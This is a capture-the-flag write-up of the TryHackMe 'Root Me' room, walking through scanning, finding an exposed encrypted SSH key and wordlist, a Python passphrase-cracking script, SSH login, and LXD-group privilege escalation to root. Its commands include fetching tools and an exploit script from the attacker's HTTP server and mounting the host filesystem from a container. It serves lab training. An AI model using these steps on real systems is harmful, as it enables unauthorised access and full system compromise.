CatSec.org

Root Me

In this post, we will look into the room “Root Me” from TryHackMe, which can be found on https://tryhackme.com

As usual we start by some ports and services discovery using rustscan or directly nmap (as you like)

$ rustscan 10.10.117.105 --ulimit 5000

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
HACK THE PLANET

[~] Automatically increasing ulimit value to 5000.
Open 10.10.96.105:22
Open 10.10.96.105:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -vvv -p 22,80 10.10.117.105

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-31 15:37 CEST
Initiating Ping Scan at 15:37
Scanning 10.10.117.105 [2 ports]
Completed Ping Scan at 15:37, 0.42s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:37
Completed Parallel DNS resolution of 1 host. at 15:37, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 15:37
Scanning 10.10.117.105 [2 ports]
Discovered open port 80/tcp on 10.10.117.105
Discovered open port 22/tcp on 10.10.117.105
Completed Connect Scan at 15:37, 0.06s elapsed (2 total ports)
Nmap scan report for 10.10.117.105
Host is up, received syn-ack (0.34s latency).
Scanned at 2020-08-31 15:37:21 CEST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds

Two interesting port are open

  • 22/tcp open ssh
  • 80/tcp open http

Let’s fire nikto and see what kind of information disclosure we can get from it

$ nikto -h 10.10.117.105

- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.117.105
+ Target Hostname:    10.10.117.105
+ Target Port:        80
+ Start Time:         2020-08-31 15:46:03 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xaca 0x59e40b71bc7ab 
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ File/dir '/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ OSVDB-3268: /secret/: Directory indexing found.
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6544 items checked: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2020-08-31 15:49:54 (GMT2) (231 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Humm, robot.txt is often interesting

$ curl http://10.10.117.105/robots.txt

user-agent: *
Allow: /
/uploads/

Ok we have for the moment 2 interesting directories to investigate

  • /uploads
  • /secret

Let’s see it gobuster can give us more useful information (adding some file extensions search)

$ gobuster -w /usr/share/dirb/wordlists/common.txt -x php,html,txt,pdf -u 10.10.117.105

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.117.105/
[+] Threads      : 10
[+] Wordlist     : /usr/share/dirb/wordlists/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php,html,txt,pdf
[+] Timeout      : 10s
=====================================================
2020/08/31 15:47:35 Starting gobuster
=====================================================
/about.php (Status: 200)
/about.html (Status: 200)
/index.html (Status: 200)
/index.html (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/secret (Status: 301)
/uploads (Status: 301)
=====================================================
2020/08/31 15:49:00 Finished
=====================================================

No more info, good, let’s see what we can get from /secret and /uploads

wget is our friend

 $ wget http://10.10.117.105/secret/secretKey    

--2020-09-01 19:29:46--  http://10.10.117.105/secret/secretKey
Connecting to 10.10.117.105:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1766 (1,7K)
Saving to: ‘secretKey’

secretKey.1                                                 100%[==========================================================================================>]   1,72K  --.-KB/s    in 0s      

2020-09-01 19:29:46 (139 MB/s) - ‘secretKey’ saved [1766/1766]

Ok, we have an rsa encrypted key, we should try to make an ssh connexion with it

$ cat secretKey

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547

T7+F+3ilm5FcFZx24mnrugMY455vI461ziMb4NYk9YJV5uwcrx4QflP2Q2Vk8phx
H4P+PLb79nCc0SrBOPBlB0V3pjLJbf2hKbZazFLtq4FjZq66aLLIr2dRw74MzHSM
FznFI7jsxYFwPUqZtkz5sTcX1afch+IU5/Id4zTTsCO8qqs6qv5QkMXVGs77F2kS
...
9zlECjERSysbUKYccnFknB1DwuJExD/erGRiLBYOGuMatc+EoagKkGpSZm4FtcIO
IrwxeyChI32vJs9W93PUqHMgCJGXEpY7/INMUQahDf3wnlVhBC10UWH9piIOupNN
SkjSbrIxOgWJhIcpE9BLVUE4ndAMi3t05MY1U0ko7/vvhzndeZcWhVJ3SdcIAx4g
....
w7uYJFhjijw8tw8WwaPHHQeYtHgrtwhmC/gLj1gxAq532QAgmXGoazXd3IeFRtGB
6+HLDl8VRDz1/4iZhafDC2gihKeWOjmLh83QqKwa4s1XIB6BKPZS/OgyM4RMnN3u
Zmv1rDPL+0yzt6A5BHENXfkNfFWRWQxvKtiGlSLmywPP5OHnv0mzb16QG0Es1FPl
xhVyHt/WKlaVZfTdrJneTn8Uu3vZ82MFf+evbdMPZMx9Xc3Ix7/hFeIxCdoMN4i6
8BoZFQBcoJaOufnLkTC0hHxN7T/t/QvcaIsWSFWdgwwnYFaJncHeEj7d1hnmsAii
b79Dfy384/lnjZMtX1NXIEghzQj5ga8TFnHe8umDNx5Cq5GpYN1BUtfWFYqtkGcn
....
wTqOP0XWjqufWNEIXXIpwXFctpZaEQcC40LpbBGTDiVWTQyx8AuI6YOfIt+k64fG
rtfjWPVv3yGOJmiqQOa8/pDGgtNPgnJmFFrBy2d37KzSoNpTlXmeT/drkeTaP6YW
RTz8Ieg+fmVtsgQelZQ44mhy0vE48o92Kxj3uAB6jZp8jxgACpcNBt3isg7H/dq6
oYiTtCJrL3IctTrEuBW8gE37UbSRqTuj9Foy+ynGmNPx5HQeC5aO/GoeSH0FelTk
....
99x7Dh8YXnj1As2gY+MMQHVuvCpnwRR7XLmK8Fj3TZU+WHK5P6W5fLK7u3MVt1eq
Ezf26lghbnEUn17KKu+VQ6EdIPL150HSks5V+2fC8JTQ1fl3rI9vowPPuC8aNj+Q
Qu5m65A5Urmr8Y01/Wjqn2wC7upxzt6hNBIMbcNrndZkg80feKZ8RD7wE7Exll2h
v3SBMMCT5ZrBFq54ia0ohThQ8hklPqYhdSebkQtU5HPYh+EL/vU1L9PfGv0zipst
gbLFOSPp+GmklnRpihaXaGYXsoKfXvAxGCVIhbaWLAp5AybIiXHyBWsbhbSRMK+P
-----END RSA PRIVATE KEY-----
$ wget http://10.10.117.105/uploads/dict.lst     

--2020-09-01 19:33:56--  http://10.10.117.105/uploads/dict.lst
Connecting to 10.10.117.105:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2006 (2,0K)
Saving to: ‘dict.lst’

dict.lst.1                                                  100%[==========================================================================================>]   1,96K  --.-KB/s    in 0s      

2020-09-01 19:33:56 (144 MB/s) - ‘dict.lst’ saved [2006/2006]
$ tail -10 dict.lst   

1qaz2wsx
dragon
master
monkey
letmein
login
princess
solo
qwertyuiop
starwars
$ wc -l dict.lst 

222 dict.lst

Ok we have a secret key, we have a dict file, we are still missing a user name.

Let’s continue doing some recon on web pages and display page source of each one

In the source of the index page we can see a comment asking user john to add some actual content to the site

Let’s test this user with the previous key

$ ssh -i secretKey john@10.10.117.105 

The authenticity of host '10.10.117.105 (10.10.117.105)' can't be established.
ECDSA key fingerprint is SHA256:LO5bYqjXqLnB39jxUzFMiOaZ1YnyFGGXUmf1edL6R9o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.117.105' (ECDSA) to the list of known hosts.
Enter passphrase for key 'secretKey': 

Ok, the key is protected with a passphrase and we know that we found a dict file with a lot of ‘perhaps’ password, let’s write a simple python script to test all those password from dict file against the secretkey

$ cat crackRSAKey.py 


import paramiko
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('--key', '-k', help='The key file', required=True)
parser.add_argument('--wordlist', '-w', help='The wordlist file', required=True)
parser.add_argument('--verbose', '-v', action="store_true", help='Activate verbose mode', required=False)

args = parser.parse_args()

with open(args.wordlist, 'r') as w:
    for secret in w:
        secret = secret.strip()
        try:
            key = paramiko.RSAKey.from_private_key_file(args.key, secret )
            print(f'✓ -> {secret}')
            exit(0)
        except:
            if args.verbose:
                print(f'✗ -> {secret}')

Test time

$ python3 crackRSAKey.py --wordlist dict.lst --key secretKey

✓ -> ...ThePassPhrase...

Perfect we have our passphrase

$ ssh -i secretKey john@10.10.117.105

Enter passphrase for key 'secretKey': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-76-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Sep  1 17:38:52 UTC 2020

  System load:  0.0               Processes:           96
  Usage of /:   41.1% of 9.78GB   Users logged in:     0
  Memory usage: 32%               IP address for eth0: 10.10.117.105
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.


Last login: Mon Jul 27 20:17:26 2020 from 10.8.5.10
john@exploitable:~$ 

Now we are in as john

john@exploitable:~$ ll
total 60
drwxr-xr-x 8 john john  4096 Jul 27 20:24 ./
drwxr-xr-x 3 root root  4096 Feb  5  2020 ../
lrwxrwxrwx 1 john john     9 Jul 27 20:24 .bash_history -> /dev/null
-rw-r--r-- 1 john john   220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 john john  3771 Apr  4  2018 .bashrc
drwx------ 2 john john  4096 Feb  5  2020 .cache/
drwxr-x--- 3 john john  4096 Jul 27 20:15 .config/
drwx------ 3 john john  4096 Feb  5  2020 .gnupg/
drwxrwxr-x 3 john john  4096 Jul 27 20:13 .local/
-rw-r--r-- 1 john john   807 Apr  4  2018 .profile
drwx------ 2 john john  4096 Feb  5  2020 .ssh/
-rw-r--r-- 1 john john     0 Feb  5  2020 .sudo_as_admin_successful
drwxr-xr-x 2 root root  4096 Feb  5  2020 .vim/
-rw------- 1 root root 12070 Jul 27 20:21 .viminfo
-rw-rw-r-- 1 john john    33 Feb  5  2020 user.txt
john@exploitable:~$ cat user.txt 
a5c...................e7e

Boom, we get the user flag, let’s check how we can do privesc from john

To speed up the process, I will upload linpeas.sh to the machine and fire it up, but before, i have to get my vpn ip

$ ip a s tun0 

9: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 100
    link/none 
    inet 10.9.xx.yy/16 brd 10.9.255.255 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80::9657:275d:8291:9277/64 scope link stable-privacy 
       valid_lft forever preferred_lft forever
  • On my machine
$ ll linpeas.sh 
  rwxr-xr-x  1  501  dialout   237 KiB  Tue Sep  1 07:48:17 2020    linpeas.sh 

$ python -m  SimpleHTTPServer                               
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.117.105 - - [01/Sep/2020 19:42:25] "GET /linpeas.sh HTTP/1.1" 200 -
  • On Game Server machine
john@exploitable:~$ cd /dev/shm
john@exploitable:/dev/shm$ wget http://10.9.80.49:8000/linpeas.sh
--2020-09-01 17:42:25--  http://10.9.80.49:8000/linpeas.sh
Connecting to 10.9.80.49:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 243613 (238K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                                                  100%[=========================================================================================>] 237.90K  1.35MB/s    in 0.2s    

2020-09-01 17:42:25 (1.35 MB/s) - ‘linpeas.sh’ saved [243613/243613]

john@exploitable:/dev/shm$ chmod u+x linpeas.sh 
john@exploitable:/dev/shm$ ll linpeas.sh 
-rwxrw-r-- 1 john john 243613 Sep  1 05:48 linpeas.sh*

Now we can fire up linpeas.sh and check interesting parts of its output

We are on an ubuntu-18.04.1 and we have john as a member of lxd group, this is our privEsc entry point (for more info you can ready this article about LXD PrivEsc)

Let’s do some google search

Ok let’s dive into this exploit-db CVE

Ok, we have to follow those 4 steps to perhaps get the privEsc we are looking for

Let’s first copy the exploit script and save it into our machine as lxdExploit.sh

$ vim lxdExploit.sh

$ tail -20 lxdExploit.sh
  lxc stop privesc && lxc delete privesc && lxc image delete alpine
  echo " [√]"
}

set -o nounset
set -o errexit

declare -i parameter_enable=0; while getopts ":f:h:" arg; do
  case $arg in
    f) filename=$OPTARG && let parameter_enable+=1;;
    h) helpPanel;;
  esac
done

if [ $parameter_enable -ne 1 ]; then
  helpPanel
else
  createContainer
fi
  • Step 1 : Download build-alpine (store it into your /tmp directory)
$ wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine                                     
--2020-09-01 19:52:41--  https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.120.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.120.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7498 (7,3K) [text/plain]
Saving to: ‘build-alpine.1’

build-alpine.1                                              100%[========================================================================================================================================>]   7,32K  --.-KB/s    in 0,002s  

2020-09-01 19:52:42 (4,15 MB/s) - ‘build-alpine’ saved [7498/7498]
  • Step 2 : Build the container

change the user to root and copy build-alpine into /tmp

root@prime:/tmp# ./build-alpine 
Determining the latest release... v3.12
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86_64
Downloading alpine-mirrors-3.5.10-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading alpine-keys-2.2-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading apk-tools-static-2.10.5-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK
Verified OK
Selecting mirror http://dl-8.alpinelinux.org/alpine/v3.12/main
fetch http://dl-8.alpinelinux.org/alpine/v3.12/main/x86_64/APKINDEX.tar.gz
(1/19) Installing musl (1.1.24-r9)
(2/19) Installing busybox (1.31.1-r19)
Executing busybox-1.31.1-r19.post-install
(3/19) Installing alpine-baselayout (3.2.0-r7)
Executing alpine-baselayout-3.2.0-r7.pre-install
Executing alpine-baselayout-3.2.0-r7.post-install
(4/19) Installing openrc (0.42.1-r11)
Executing openrc-0.42.1-r11.post-install
(5/19) Installing alpine-conf (3.9.0-r1)
(6/19) Installing libcrypto1.1 (1.1.1g-r0)
(7/19) Installing libssl1.1 (1.1.1g-r0)
(8/19) Installing ca-certificates-bundle (20191127-r4)
(9/19) Installing libtls-standalone (2.9.1-r1)
(10/19) Installing ssl_client (1.31.1-r19)
(11/19) Installing zlib (1.2.11-r3)
(12/19) Installing apk-tools (2.10.5-r1)
(13/19) Installing busybox-suid (1.31.1-r19)
(14/19) Installing busybox-initscripts (3.2-r2)
Executing busybox-initscripts-3.2-r2.post-install
(15/19) Installing scanelf (1.2.6-r0)
(16/19) Installing musl-utils (1.1.24-r9)
(17/19) Installing libc-utils (0.7.2-r3)
(18/19) Installing alpine-keys (2.2-r0)
(19/19) Installing alpine-base (3.12.0-r0)
Executing busybox-1.31.1-r19.trigger
OK: 8 MiB in 19 packages
root@prime:/tmp# 

Great !

root@prime:/tmp# ll alpine-v3.12-x86_64-20200901_1955.tar.gz 
-rw-r--r-- 1 root root 3199601 sept.  1 19:55 alpine-v3.12-x86_64-20200901_1955.tar.gz

Now we have to upload the container and the lxdExploit.sh script into the Game Server machine

  • On my machine
root@prime:/tmp# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.117.105 - - [01/Sep/2020 19:57:40] "GET /alpine-v3.12-x86_64-20200901_1955.tar.gz HTTP/1.1" 200 -
10.10.117.105 - - [01/Sep/2020 19:57:54] "GET /lxdExploit.sh HTTP/1.1" 200 -
  • On Game Server machine
john@exploitable:/dev/shm$ wget http://10.9.80.49:8000/alpine-v3.12-x86_64-20200901_1955.tar.gz
--2020-09-01 17:57:41--  http://10.9.80.49:8000/alpine-v3.12-x86_64-20200901_1955.tar.gz
Connecting to 10.9.80.49:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3199601 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20200901_1955.tar.gz’

alpine-v3.12-x86_64-20200901_1955.tar.gz                    100%[=============================================================================>]   3.05M  2.01MB/s    in 1.5s    

2020-09-01 17:57:42 (2.01 MB/s) - ‘alpine-v3.12-x86_64-20200901_1955.tar.gz’ saved [3199601/3199601]

john@exploitable:/dev/shm$ wget http://10.9.80.49:8000/lxdExploit.sh
--2020-09-01 17:57:54--  http://10.9.80.49:8000/lxdExploit.sh
Connecting to 10.9.80.49:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1453 (1.4K) [text/x-sh]
Saving to: ‘lxdExploit.sh’

lxdExploit.sh                                               100%[=============================================================================>]   1.42K  --.-KB/s    in 0s      

2020-09-01 17:57:54 (248 MB/s) - ‘lxdExploit.sh’ saved [1453/1453]

john@exploitable:/dev/shm$ 
  • Starting the Attack

if the attack is successful, we have to move to /mnt/root in the container to see the host machine file and access it as root

john@exploitable:/dev/shm$ chmod u+x lxdExploit.sh
john@exploitable:/dev/shm$ ./lxdExploit.sh -f alpine-v3.12-x86_64-20200901_1955.tar.gz 
Image imported with fingerprint: d05934f9f6d3ffe6d3a2e8e7ba814b64e4007b0d9f1e405a39bdb0365db65ca2
[*] Listing images...

+--------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
| ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE         |
+--------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
| alpine | d05934f9f6d3 | no     | alpine v3.12 (20200901_19:55) | x86_64 | 3.05MB | Sep 1, 2020 at 5:59pm (UTC) |
+--------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
Creating privesc
Device giveMeRoot added to privesc
~ # id
uid=0(root) gid=0(root)
~ # cd /mnt/root/root/
/mnt/root/root # ls -l
total 4
-rw-r--r--    1 root     root            33 Feb  5  2020 root.txt
/mnt/root/root # cat root.txt 
2e3..........................8fc

We are root and we can now get the root flag

/mnt/root/root # exit
[*] Removing container... [√]
john@exploitable:/dev/shm$